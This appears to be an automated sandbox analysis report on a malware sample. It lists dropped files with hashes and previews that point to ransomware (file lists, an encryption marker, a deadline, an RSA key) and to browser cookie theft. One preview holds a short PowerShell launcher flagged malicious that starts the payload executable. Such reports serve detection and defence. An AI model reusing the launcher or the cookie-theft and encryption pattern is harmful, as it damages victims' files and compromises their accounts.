                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:EWfWvnLaZj5f2ZjV6zbawd1w7rTtrLbCMhMptqSwDvI7z3PTg:EWu+N5ba0q7fZLbkptzwDvmPg
                                                                                                                                                                                                                                            MD5:FD02061800E7230265937E48263DA715
                                                                                                                                                                                                                                            SHA1:831260343D2234F75FDCC841A219FB880E116D80
                                                                                                                                                                                                                                            SHA-256:FEFC02E76AE72B53DAD34A5203EA0D569C3A9E0967C9A76D8CE18CDCF7F3E373
                                                                                                                                                                                                                                            SHA-512:E735F9515BB8B38151666FD9CE3C61B853E61AB0EB000991DC45C741A5D1A280A0B36FE68D9F91E07849A978B5E27BB87EDDA3E70E52AEAC257F4C506B6A56BF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64Ak07CcHv0B6Od5LGpywAFNl-SphpXBAqf_mlxvMa6gMvLpAzVKhLFMyoMyLr6rW0FhfOfbMWpieBac_wF5qZ4ibi6G3_0v5BCi9Zs4EP1uM9hANJDQCcGmEJMZX0OQRXygxrDXICqLtuApupsxebzQUeTq16JQtnXaJCbTVLJ8JVKkuovmxE-q4KcewGoKe6GeOYE9WuyDeM_YCwTk4hIV1vecP0igFmgLmLDduKJXIeM1FWSAZrf0xw-YF3-QTdXd_tM9LDC8TRNHaVezMeBs2euixSgWSO6H-5CeVbvczZ-xJb80MaOACLGA1yS_sDK04Vw98QchsMb6isfrrD5I_wOiyNLxOjZ0v6lOcEe-TWV7MDAmdmW7KYm6gTo7yY2GRv7_UZmEG2XxbX5UhtPxFdvk5cBlAsR0abRPP5plFHG8mfmmyK-AEeb6sJH1MUFOq9YSB4Cz0s5M6An5XmHRf2HNaFOMQvBcos8ToolHuC3g0WHOF6SWPZmmCKD-l_m578VOvv6uiygfp1LrK072epzwh8-THHDV9Un2VG8FevIejqSVWmpKrdS4_mocxn9STMWvqYHbD_vEiidgekv48fohUTccGj1e50BubDUp5EljJ_fWZwmw0Ecvwn9EyhhoSnW5TvjUV1-MmlUukDq2v8afjwcFKCOxY4xp_-dXKZ5yOqBxJhhDk5A9OtOZAXubatJ1ErmZEOy4035qBXK-twb9P86y99smYQSdJDFSyep0U8F9WTlVBKdFgpUjJbCw1uULnYCUAtPBgtpM0XoogEGX2eS1TLt3ahFtq86Q9p7M2gF7UCGXppXN5kL0pwf69UdRvwqqWnFIIkhePvM7Aw9TK4dUDjw3b51F6jVWjgetY-YjLASc3uGaliTkjSqeSGr3vkOFLLl5ePWi8flhGh1vz3bB5lmHyUJqp-xQ2pDnreUpWWwk-4zx5SpQt9-d6Qv4JEW-LRQcDaXjgeSlSI11xG
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):36368223
                                                                                                                                                                                                                                            Entropy (8bit):7.998911986420214
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:786432:6hg5S6CiVx8US9ANmj4unW8AWAOepsgHUUkAO28yU5hBGb/pu:h5SUVxP074GzArsgvkxJnBGjpu
                                                                                                                                                                                                                                            MD5:F400CCE02E84C783E9657D9D991E88DA
                                                                                                                                                                                                                                            SHA1:1608DB9248E38328A110F8BE1EB92F92A0DB03E5
                                                                                                                                                                                                                                            SHA-256:1466D2A2AA7789558292BDC9A8C35EF9EDD4290417A7E0862F1874F5B55FCE5D
                                                                                                                                                                                                                                            SHA-512:7AB63BCEBF326E127AE181DA3E516E3B8F52B98D3033764B73626336CBF2F5C67BBF44EE9B5A1F1D32A6314EEC7AB2A51633B9D9E7DCB423CC8FBD0E03CA5F69
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:PK..........YY.!.._..........payload/ChromeComboPack.exe.yx.U.7\..@..Y..(4.j.]....H..j.@.Ue.h.7dH7..H...)Zq.}.E.mfp..6..YXB.Q...[.-..!....9....`..{.....x.Uu...{..{..:........S..+..?.....8.S....O;..Sf...3n....Y..........?s..~....f.f...is..k{.....9%..]..E..~......+/y.k...=.V...=..|.Ez&.^I...=;..7.:Q..{uz.+<.y9iu..)._.........V!..q..i..3......].%.;.q.6r.8#.....zu.8....i.'..L..5).`.W...b...`i......../+.....9=.k.&.Ph.f..5_.........I%T..`d.|..7.....c##....m@......?..K3.<o.g........`\.8...:.....W~.,..:B]9..c..\7.........4..uiM .=....D.!..Dx..mq......%..&.../M.".r.5.Gx.L...asEV.W.].'.&.-b.o..Bn{.Da.0^. L...:}....b......^.E......'..q.Oj.K..VoxB.1..>...)....2$H..<..i%..W.......}eW...........i ..xH.y....9L<*Y..0...E8.ij......m......Bi.b.`...C.k.....J_a._Ax.~.D.=f...%...2..|o......f...'J..B..6.....!J_........E.qJ):..vJ.T`.%J.oI.?.+.....X.....%........,J..T...d..A."J~.<1..)L...S.....>.S.Pm[Xmo.L.....q.~>{....&R.....(O/..D...#Jg.9I(.......MUF.^...n
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):17046266
                                                                                                                                                                                                                                            Entropy (8bit):7.996297542116604
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:393216:pEkwGV29QhZ2YsHFUK2Jn1+TtIiF/ZxSINsIHebxFsHKWP:pn6QZ2YwUlJn1QtI6YTI+jsH
                                                                                                                                                                                                                                            MD5:8FD73177DC4A6FCC03F8E0307960A488
                                                                                                                                                                                                                                            SHA1:B9DE46BD491C40F9B57E044873BAC97D3600C8EC
                                                                                                                                                                                                                                            SHA-256:E90E4742289A8D04D00C77FD1CFDA59E8796AA2C6BB6B3F7E7D6B3EFB542EEBC
                                                                                                                                                                                                                                            SHA-512:EE2B9CE000BC10219FAE0940E731B34D4E6E32D160CEEEA4E8346A93DC8F522200CFC2B41A568F14E9DCFFF59E3C0F304E5F8DD0E0874D6C38291E2D37A71701
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a..............f.......f..)....f......Y.....Y.......Y.......Y........f..............................Rich....................PE..d...)..g.........."....(.....T...... ..........@.....................................X....`.................................................,...P............`..."..............h...................................p...@............................................text............................... ..`.rdata..B(.......*..................@..@.data....T..........................@....pdata..."...`...$..................@..@.rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):106496
                                                                                                                                                                                                                                            Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                            MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                            SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                                            SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                            SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1144), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1144
                                                                                                                                                                                                                                            Entropy (8bit):5.954415062920959
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Wb+TJYuR9yoo+hnnM3afHXFN4ep7GOMqCOEymX0pommtMs2fCMcDX2udB3:9JYuR9yd+hnn6k3FrpDCOEymXQommSIx
                                                                                                                                                                                                                                            MD5:6D3301F256B76268FF6C2C3A21CEF1F2
                                                                                                                                                                                                                                            SHA1:6930CB09D5F1EFDA6AA4931D947E82FD89734ED5
                                                                                                                                                                                                                                            SHA-256:42AF8321A4EE7CD4BE14F06763611A02777D9E635F1D5D4B86DDC6A52E6C1299
                                                                                                                                                                                                                                            SHA-512:9ABE966054C92D0363EC03028AC710F612B80A69D08A23996D8C7A7516A6729F4E975AE5FB039042DAFCD558443E5F16BB5E6FF28B3331C61EE1DA60B2ED7FDB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC8XrQuLS-hIvcNWsgRMbBiRu8vMktl7QSvI7h5AhQ3ditmTTqoZr-ky-4zzuP-eKf2jD0NC53cjYc7f2TM0WZZQF5BVNh5I0MBdzFDzzGGtZ4PTl15jajfhVXhhjYM_i-j74s9VOQ7ChPN6plc8u0-j2Hg5NyIKHgtdZIO_67ZN6UqXWmRNYpSHPsxxmmnP4DPBe1EQKvYiGW00uqEXYz9XyOLDDh01qTDigZqHV20DsqA4KDkLDsJZxu1g78DTSWGaFUhv9uPpfyecfOnkro71CvFwTt23AxZDAUJiHysnSggUo2M0RlSMKIiqA9LIm3IWfvwSDQEdpKxhY62HagIoI95oIlkEGLqZ963tD1zDBm5Hid53BAotUi7TU4KB9zbraEcfYQNKTKIVVKkqhYneFDvrcQJ840RiQI4Vdf38MxPAQEFrIH-VhZjhLdgTELrI3JPMDzOAJLNcSc1nBMKY1qRgiZl1qDWjlS3XpfwdyKvtHFhnZ1TcQdYXNOFuQ2_tIZ2d4Qqw2whH2ykDSfq9vwQ8ju00ODSE5BUR7XDGh1wwIcvfU-xWmfZIbxSq7v-q0O8jmksp1NOAye35sARjdze28lbM559MispVN-A-kPj1VmT85srDkrvCe0InKXFYB1iJy-IZUZkNCoozl31DRv7XOf4OHYoIARVypmN5QKeyGru8P2lRbVqQ9rBROHCuR4cxlLXxEsUcnaqVL4_JHra5oV8ENif-cYzqBBFGHhzgE2p7Sg764vJSnvRY3V84S0hfbqxnnRBxzGnJd7Y9kzxHGrcUN932U5NX2CYPNIJEFIGAdKS40YJBgEScTrjUkB-Rrg4YZfXluILq3b803I7-abIlqMQ1dtIT5bp4FB5-vuYXmh0kKDrPVKVHPqg_rXCjiiykAbFVtNYP28ufDay1B3Ef4o1wCfSo396IZ0XiJ5wp0cMMdSQOeFegcLX4pMrPn_SkiAS0M15zrgSIHxeaGEeo
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):774
                                                                                                                                                                                                                                            Entropy (8bit):5.2272790126556785
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:NB60bWVPk40ealDuyXv3RdJqmOvO61A09xZEvDV9rq19XRX60bWVPk4aGw09xbVH:n60kLBy/3nJqm2X5TE89RX60kYGLTkI
                                                                                                                                                                                                                                            MD5:8754D36380A2384A187E9F38A1273BC4
                                                                                                                                                                                                                                            SHA1:333350773ECB311D0650D1F4ABFC5CC6FAB6FB0D
                                                                                                                                                                                                                                            SHA-256:9AA4B96ED917A112A7B3134105FC126A7966E96580FCAD09FF47BF539E5F7B83
                                                                                                                                                                                                                                            SHA-512:52A512BAA172638324630EB91D262DE7E3B53A934967A8C8C87F48608ABDC5144CF8D1534E018C29E9133EE3465B93F1E4FFC5015E4E7ECBB8AC547407722156
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:[.. {.. "profile": "Default",.. "host": ".google.com",.. "name": "NID",.. "value": "511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg",.. "creation_utc": "2023-10-05 06:20:03.392648",.. "last_access_utc": "2023-10-05 06:43:36.550323",.. "expires_utc": "2024-04-05 06:20:02.392648".. },.. {.. "profile": "Default",.. "host": ".google.com",.. "name": "1P_JAR",.. "value": "2023-10-05-06",.. "creation_utc": "2023-10-05 06:20:03.186095",.. "last_access_utc": "2023-10-05 06:43:36.550323",.. "expires_utc": "2023-11-04 06:20:40.345167".. }..]
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2108004
                                                                                                                                                                                                                                            Entropy (8bit):5.999992595516935
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:Gj9tIPQFbyP5DmGgwrUAJBl6WprfA3q6l+h6RI+h6iDCtoh9uWRWkI+QHMm5YvX/:iBF2hm5Au6wlIhWFmYBSMGqxZz
                                                                                                                                                                                                                                            MD5:6EFB40122349621E35ADA5C75FC2E9E2
                                                                                                                                                                                                                                            SHA1:B3572FD051E76B1C920B3DBE71331AE3EFED8136
                                                                                                                                                                                                                                            SHA-256:C08F7C457588D1B126BEA0377DACA18E74A21A787A3333BEAD10B69411FE81A5
                                                                                                                                                                                                                                            SHA-512:C10686CB6958E5697350EFD068CCDB134E86CE5BF33F7DDB520296CCEEC79AE10655728C24BB4EC15697C8557B44CA3032090727958B625F6C91AD073B0F8CA3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64f1UWzewFfdb9mIbBtOoiLkqpEUJdUXHPPT3yqq_Wd4PQagj2YCcZ0aNzzUZEA7SHVlVxvNq5QvXKmM9lMoepN-bhDsDUKOo0ykoeuKdqyzDaVDRqQF_5s63cYuQRRrOUeH5cJlxx1rdFsiMBZSHtjGHPQow1q-EQQba2_58yPT8LR1hAtkFGCs-NLrqJcY8TxdmM8dLUYbMczw6ii_46kXEeJDXMz9huP-vYVJzt39NsBemNDdgPtzA7TxGYyeV2ITMKRB43Cc8NvQ7vYluzRqkcfr0S0tyxxDynB6zFGPxb3D8xrxKH3pfSydtcgUOZvzatSxrHBga1DzTc_Vh6KPAc_if_g1mGK1Wl9boHNeZcI2_zglp6_xt6TxrWxUdFh5o6McBH4GxMqogG-YhUNhLphpk850-l0dR2PPBIKJNvq8Cax9r9KHNDWwiTc_KKEqLyN8wBQP62p7gxkwFV2HJHVNS5ZyclnI00oTsxNPAURmdBBgtiqyj92c9ezlN76AaGwQXdxI7x5s0KHayu_pSpSjs39-gta1fk1BjvoUEF7hxiKEUGcJyHdcdefQhgRxeEUWbjvNJVlA83OdT2s1i0LcLlSz_zrOx0QJEuz1sbHuLB3qvRwGJ_GF49Zb1CQ13Le3SK3zhhKKH4wgTWC8XCMkbhYhgdHaSgUOguVchZEVwC7qraJXXOJhZ2x2BokDy0j8ek2pA4-Eq5cFOoIVPT_Acy3aYEeWJbQAPZ_EuKA-YA4yz2a6iJ6RPYuU9mly2Gvxe9xIpc0EcH0qpI4yyeG7XWfD1iW2piHDGMCMpL8pMZPh2le8ASE49ZAXsMa5DsJGNJkYls2aFeaXA7xD4VkxdDThKxDCxRqICfkon2mzOgtsxxAANLoPyUijvrV0vr7CfTkVFuoAhWmSb-rJ_BLMZyJ7i_h4AjLvY19Ixj38ce2WaD9z5RUp0BHNP6YdeuhJIQ_JNOlFH6xCZKUiiGHMue
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):42
                                                                                                                                                                                                                                            Entropy (8bit):4.3087513512471665
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:YBAVLAH1lqd5:YDqd5
                                                                                                                                                                                                                                            MD5:E7C74D7E6B4169D1DF8CBAE021597BED
                                                                                                                                                                                                                                            SHA1:A64889296B735D755B4EBF037C751927E2C51CDE
                                                                                                                                                                                                                                            SHA-256:8807992AEE6EF151415C638479DBE66142AC28FCEB5A5F988C8DCC10F8FE87DA
                                                                                                                                                                                                                                            SHA-512:A3A03C06EC29DE3BB2EC7DB12BEC623A7EBB809D71D33325EF108969CB8D1B4976E867D039E10B2D1F4819DBCCA18C962363192AF09E40E909D7C8565B4C85A6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:{"deadline": "2024-12-01T08:38:55.688609"}
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3665
                                                                                                                                                                                                                                            Entropy (8bit):4.8906208379716105
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:oPpMtO1P8OavkVX8V0dJY+7TbWtOzQvkVjJLthRoVM8OixHVV/B+/mJhVh8Old8r:oy8ON8DnKvH3nwNc4y4NWcmHQfHW8sY
                                                                                                                                                                                                                                            MD5:B6C5506CDBFDBF6007A2A274AB967223
                                                                                                                                                                                                                                            SHA1:1866B8243EFAFEE67BFE0146C22D6FB583D110F0
                                                                                                                                                                                                                                            SHA-256:FD68BDAC518F544DC0A18F80715C86E8A94A6D18A02DD577494F603A804A7B2D
                                                                                                                                                                                                                                            SHA-512:B5DF5007B410B273410877A76CBFCE857798B265E7D6F937E08E6DF1427085F1E661FA393DAA422331886B5465363662E178377445817357253A24081590C5A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:C:\Users\user\..\user\Documents\BJZFPPWAPT.docx..C:\Users\user\..\user\Documents\DUUDTUBZFW.pdf..C:\Users\user\..\user\Documents\EIVQSAOTAQ.mp3..C:\Users\user\..\user\Documents\EIVQSAOTAQ.pdf..C:\Users\user\..\user\Documents\EOWRVPQCCS.jpg..C:\Users\user\..\user\Documents\EOWRVPQCCS.xlsx..C:\Users\user\..\user\Documents\GIGIYTFFYT.jpg..C:\Users\user\..\user\Documents\PALRGUCVEH.docx..C:\Users\user\..\user\Documents\PALRGUCVEH.xlsx..C:\Users\user\..\user\Documents\QCOILOQIKC.mp3..C:\Users\user\..\user\Documents\TQDFJHPUIU.png..C:\Users\user\..\user\Documents\ZGGKNSUKOP.png..C:\Users\user\..\user\Documents\BJZFPPWAPT\BJZFPPWAPT.docx..C:\Users\user\..\user\Documents\BJZFPPWAPT\DUUDTUBZFW.pdf..C:\Users\user\..\user\Documents\BJZFPPWAPT\EIVQSAOTAQ.mp3..C:\Users\user\..\user\Documents\BJZFPPWAPT\EOWRVPQCCS.jpg..C:\Users\user\..\user\Documents\BJZFPPWAPT\PALR
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9
                                                                                                                                                                                                                                            Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:OGMEB:OGMEB
                                                                                                                                                                                                                                            MD5:DEF09FA4A833717D38298EB37C861AF8
                                                                                                                                                                                                                                            SHA1:BDE2FBB6F581D23EE4F9298B214A9D7380EA040F
                                                                                                                                                                                                                                            SHA-256:F45AEF6E0F7ECA1B9D7123510EBA06F1E9CB6905405A4D3615D0CC428AAA77D8
                                                                                                                                                                                                                                            SHA-512:F827A0CBEBE1A2F455D48EADF585CC1BDD214C8FC83FFA6D84C2E97EF0DC22BF93303C5F145CD2F88D2FD4D468F7A27F39D94CEDC64A333F54A532035C013129
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Encrypted
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):256
                                                                                                                                                                                                                                            Entropy (8bit):7.168620751809458
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:8++6ms+Mjn1p+LTR9wTRm+9OvFVGQTGUl0/ECAPKEdqzZv:bFms+Mj7+LTR9wVTo7GL/Edy
                                                                                                                                                                                                                                            MD5:7EB66D3125C988604FBFD3AF416CCD95
                                                                                                                                                                                                                                            SHA1:626ECBB9698D87E7F99D45981BB1638A6DAEF7BD
                                                                                                                                                                                                                                            SHA-256:A19477A848ECC3DDB8D399EF8A64C0E1FF35F70405A193A8D57C8EDBBB9E4C6F
                                                                                                                                                                                                                                            SHA-512:176DE15F7AD2B80C50ED5CFD0898C4856FC3204E81B35210C12F511F91CE05C53B278E6CF99CEF6A46E0CC8C54023C8FEBD4E971EB0CC555A7F9366DD27E0E89
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:H;....Q6.k.*......8.I.B1/J.k.t....3.V a...MHj'..,...Bu...,....w.........g......_...)...)k1.....B.=.....!..=...f(....p.%....pr.V...A1....6.zwMo...\#...3...s...X..x.'l..'.p5d.......8t=!.T|...z.9...y.._!1..%.Uh............h<.6...X.BH...'....dhYd.i.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):21
                                                                                                                                                                                                                                            Entropy (8bit):3.0589840894454268
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Bd/U:Q
                                                                                                                                                                                                                                            MD5:F1AFA59B04E1026EDE77E7E19F35A38F
                                                                                                                                                                                                                                            SHA1:D3241AD506C846F940E26A14FB52042EC3F95E0F
                                                                                                                                                                                                                                            SHA-256:4C7209946BB4436ABEB4F0B3FDFDEF077B12598DD0F7D22384B6CBADEC5331C7
                                                                                                                                                                                                                                            SHA-512:7D2764FF30670DEE95D635BB51E72168669873C7A18F2A98FCAB8B6B784A777AC231588362572CEC0E4509EB274DD4E3F4843B6B1B114A0006D454B221E0ACD5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Public IP: 00000000..
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):450
                                                                                                                                                                                                                                            Entropy (8bit):5.912518899323523
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:LrL48MyMDHIILQz+QQmdONHhRVLgPQW8+0G9/HiK0:LrLHkIILQd1OvPEPph08Po
                                                                                                                                                                                                                                            MD5:DE04753D79A80571993956CA72B88214
                                                                                                                                                                                                                                            SHA1:15ED41539C7598EA495A3E96728ADB778908C38F
                                                                                                                                                                                                                                            SHA-256:4DBCFE54987090B41CDAA800DCDA2FEBF6BD299A1491266AE81F45DD5198D7A4
                                                                                                                                                                                                                                            SHA-512:1A97B7BBB38932684B36D09659E08CE1EC460680C63A441E77D33FEF784E6FB8D9AF7CF2AB8E47CF93DCB85B4D70B4CB4B4B39E4BDBC9E7BDF4543A099F90A94
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:-----BEGIN PUBLIC KEY-----.MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuCcdmC7hnzsFXPR5ahIE.wyMgwm1ORHrg/IjBtPSzTyx4PB3EOtrSzRdqmybaydj6+JOIvNC4eQfYaoS1vTjz.hQrahTECibmhaLMTnBTG6meBmZZ0cn5mQfkACnqDXn02RsJqq+MzyFOtmlALOPSw.ZqvJYdFV9nlalk1wBx++5LNuCz/GHi2Pq3EcHJp3bVZgqli07CGG0vnhcVSFD8cL.kWngD0/btb86QF/w2qMQJn783T+SA3/YZShzbRv5XQbUGKTV9xrlCwG7F87NrQMN.EpIN8LjVD5YzwtNlBkJCuegivq4vKb+zP40fmI16feo4dfHsU0xSOrhXKaHOKaw4.ewIDAQAB.-----END PUBLIC KEY-----
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):516
                                                                                                                                                                                                                                            Entropy (8bit):4.907000521975715
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:3NLu0OqIOMMo+kN61I1bBbM81MnuNjkWsD5ZJLiVuRWY+kbL7ezfkLry:d60Oqkf+0SQtbsG4WsD5ZJLlRWYdbaM6
                                                                                                                                                                                                                                            MD5:27D7540715CCFFB96C26ED29A153F0D2
                                                                                                                                                                                                                                            SHA1:819BE500D7FA7C65E88A25FB9965255847F9EF66
                                                                                                                                                                                                                                            SHA-256:E9B9226E08BE0720D5FFD243B7B50ADF5E3BD57BC94130A417EBC596A5398367
                                                                                                                                                                                                                                            SHA-512:6F1CA4252263AAEF1D8D7D82472629F0FF14C9CD961A4C4D6CC651BA7615091F4FE429B0C4A1A36C7C63ADC3A25FA0C0D976A6D40BD997DF0416D22F946A9D12
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:$payloadFolderPath = "$env:USERPROFILE\Documents\gogjothegoat\payload"..$zedExePath = Join-Path $payloadFolderPath "zed.exe"....if (Test-Path $zedExePath) {.. if (!(Get-Process -Name "zed" -ErrorAction SilentlyContinue)) {.. Start-Process -FilePath $zedExePath -WorkingDirectory $payloadFolderPath.. Write-Output "Process started from payload folder.".. } else {.. Write-Output "Process is already running.".. }..} else {.. Write-Output "Executable not found in payload folder."..}..
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):18960364
                                                                                                                                                                                                                                            Entropy (8bit):7.996257138735604
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:393216:59YiqGV2SW8077/hZ2YsHFUK2Jn1+TtIiF/ZxSWau504NsIyFzWYi3PzNuT:59YiljW80BZ2YwUlJn1QtI6YM50DIXPY
                                                                                                                                                                                                                                            MD5:FAECB8128727E4D7B36E49B3161A2C9E
                                                                                                                                                                                                                                            SHA1:9A5D8F5D46AAD666DA03AB21F5B791C69522B279
                                                                                                                                                                                                                                            SHA-256:E46CD48EECBB40507489635DD6323A2D2E1DA717985F8894919860353F45F02B
                                                                                                                                                                                                                                            SHA-512:CFB68942326BA2798741668C77FE2E06D4F7C0B8D3FD41687BF0CFB1EBBFC29156976B2A09572F87A2B54024784F5816DD00F240D85241E6E09238762E209AF7
                                                                                                                                                                                                                                            Malicious:true
